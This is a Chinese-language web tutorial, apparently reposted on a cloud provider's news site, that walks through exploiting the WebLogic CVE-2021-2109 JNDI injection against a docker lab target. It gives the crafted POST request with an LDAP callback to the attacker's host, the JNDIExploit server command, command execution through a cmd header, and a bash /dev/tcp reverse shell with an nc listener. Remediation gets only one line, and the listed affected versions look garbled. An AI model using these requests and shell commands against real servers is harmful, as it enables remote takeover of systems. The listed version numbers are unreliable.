您好,登錄后才能下訂單哦!
如何利用Weblogic Server遠程代碼執行CVE-2021-2109 漏洞反彈,相信很多沒有經驗的人對此束手無策,為此本文總結了問題出現的原因和解決方法,通過這篇文章希望你能解決這個問題。
2021年1月20日,Oracle官方發布了漏洞補丁,修了包括 CVE-2021-2109 Weblogic Server遠程代碼執行漏洞在內的多個高危嚴重漏洞。CVE-2021-2109 中,攻擊者可構造惡意請求,造成JNDI注入,執行任意代碼,從而控制服務器。
影響版本
WebLogic 3.6.0.0
WebLogic 1.3.0.0
WebLogic 2.1.3.0
WebLogic 2.1.4.0
WebLogic 1.1.0.0
攻擊機(kali):192.168.159.131 靶機:192.168.159.139
這里使用docker來搭建環境
docker pull ismaleiva90/weblogic12
docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest
訪問http://your-ip:49163/console即可看到頁面
使用burpsuit截取訪問http://your-ip:49163/console報文,發送到repeater模塊
1、將GET /console/console.portal?_nfpb=true HTTP/1.1修改為POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.159;131:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
請注意192.168.159;131地址的第三位后面為分號,192.168.159;131為啟動LDAP服務的攻擊機IP
2、在cookie上方添加“cmd:id”來獲取靶機服務器id信息,如下圖所示
3、在攻擊機上啟動LDAP
下載地址:
https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11
java -jar JNDIExploit-v1.11.jar -i 192.168.159.131
4、重放修改過的報文,成功獲取到靶機上的id信息
5、反彈shell
在http://www.jackson-t.ca/runtime-exec-payloads.html網站將bash -i >& /dev/tcp/192.168.159.131/2333 0>&1 進行base64編碼
將編碼后的反彈shell命令復制到下圖cmd后面進行重放,同時在攻擊機上開啟nc –lvvp 2333命令監聽2333端口,點擊發送
成功反彈回shell
升級官方安全補丁
看完上述內容,你們掌握如何利用Weblogic Server遠程代碼執行CVE-2021-2109 漏洞反彈的方法了嗎?如果還想學到更多技能或想了解更多相關內容,歡迎關注億速云行業資訊頻道,感謝各位的閱讀!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。